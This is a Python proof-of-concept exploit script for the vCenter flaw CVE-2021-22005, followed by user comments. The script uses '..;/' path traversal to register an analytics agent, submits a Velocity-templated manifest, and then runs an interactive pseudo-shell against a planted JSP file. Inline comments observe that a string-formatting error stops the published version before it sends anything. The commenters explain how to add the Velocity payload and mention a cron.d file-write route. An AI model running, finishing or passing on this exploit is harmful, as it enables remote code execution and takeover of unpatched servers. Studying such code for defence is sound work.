CVE-2021-22005_PoC.py
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
# Every request below is sent with verify=False, and urllib3 would otherwise
# emit an InsecureRequestWarning for each one; silence that category up front.
_INSECURE_WARNING = urllib3.exceptions.InsecureRequestWarning
urllib3.disable_warnings(_INSECURE_WARNING)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    """Return a random string of *size* characters drawn from *chars*.

    Defaults produce six lowercase alphanumerics. Characters are picked with
    ``random.choice``, i.e. the standard (non-cryptographic) PRNG.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return "".join(picked)
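def escape(_str):
    """Return *_str* with ``&``, ``<``, ``>`` and ``"`` entity-encoded.

    As rendered on the page the four replacements had collapsed into identity
    mappings (the entities were decoded by the HTML view) and the last one was
    left with an unterminated quote; this restores the intended
    ``&amp;`` / ``&lt;`` / ``&gt;`` / ``&quot;`` encoding. Not referenced
    elsewhere in this listing.
    """
    # The ampersand must be replaced first: every later replacement
    # introduces new ampersands that must not be re-encoded.
    _str = _str.replace("&", "&amp;")
    _str = _str.replace("<", "&lt;")
    _str = _str.replace(">", "&gt;")
    _str = _str.replace("\"", "&quot;")
    return _str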
def run_shell(url, pwd, cmd):
    """POST *cmd* to *url* as one form field named *pwd* and return the text
    between the first ``<pre>`` and ``</pre>`` of the response.

    The request is sent with ``verify=False`` (server certificate not checked).
    ``.content`` is bytes; splitting it with str literals only works under
    Python 2, which the ``print`` statements elsewhere in this file also
    require. A response without a ``<pre>`` element raises IndexError on the
    split. HTTP status is never checked.
    """
    burp0_url = url
    burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    # Form body: the field name is the *pwd* string, the value the stripped command.
    burp0_data = {pwd: cmd.strip()}
    ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
    # Keep only the body of the first <pre> block.
    ct = ct.split('<pre>')[1].split('</pre>')[0]
    return ct
def createAgent(url, agent_name):
    """Send one JSON POST registering a data-app agent named *agent_name*.

    The path appended to *url* contains three ``..;/`` segments between
    ``/analytics/ceip/sdk/`` and ``/analytics/ph/api/dataapp/agent``; the
    ``X-Deployment-Secret`` header carries the fixed value ``abc`` and the
    JSON body is constant. Apart from *agent_name* the request is identical
    on every run. Sent with ``verify=False``; the response is discarded, so a
    failed registration goes unnoticed.
    """
    burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
    burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" }
    # Return value intentionally unused in the original; nothing checks status.
    requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
# --- Script body. Python 2 only: print statements and raw_input below. ---
# Per-run random identifiers: the form-field name run_shell will use, the
# agent name passed to createAgent, and a .jsp file name.
pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
# Manifest XML for the "collect" request. The template contains no
# %-conversion specifiers, yet the closing line %-formats it with three
# values; Python raises "TypeError: not all arguments converted during string
# formatting" here (the traceback reported in the comment thread). Because
# this line precedes every request, the listing as published never sends one.
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
$obj.addProperty("BUILD", $content-about-build)##
$obj.addProperty("VERSION", $content-about-version)##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)
# First CLI argument is used as the URL prefix for every request; running
# without an argument raises IndexError.
target = sys.argv[1]
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
# Second POST to the same endpoint (same ..;/ path, same fixed headers) with
# action=collect, carrying the manifest as JSON. This request alone is pinned
# to a local proxy on 127.0.0.1:8080; with nothing listening there the call
# fails with a ProxyError. The response is not inspected.
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
# "Success!" is printed unconditionally; nothing above checks any response.
print "Success!"
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
# Interactive loop: each input line goes through run_shell; "quit" exits the
# process with status -1. A one-second pause precedes printing the excerpt.
while True:
    cmd = raw_input("/remote_shell/# ").strip()
    if(cmd =="quit"):
        sys.exit(-1)
    output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
    time.sleep(1)
    print(output)
thanks it worked out but now this:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
Traceback (most recent call last):
File "C:\temp\cve20212022\CVE20212022.py", line 36, in
manifestData = """
TypeError: not all arguments converted during string formatting
Any ideas? Your video PoC is pretty smooth.
to anyone wondering you just need to modify mappingCode to execute velocity payload, this is unfinished poc so suit yourself
did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?
It looks like this is being exploited in the wild a simpler way by writing a json file to /etc/cron.d/ without doing the velocity template injection https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005 Are you going to publish a full poc?
You can fix it easily by editing the print lines from
print ""
To
print("")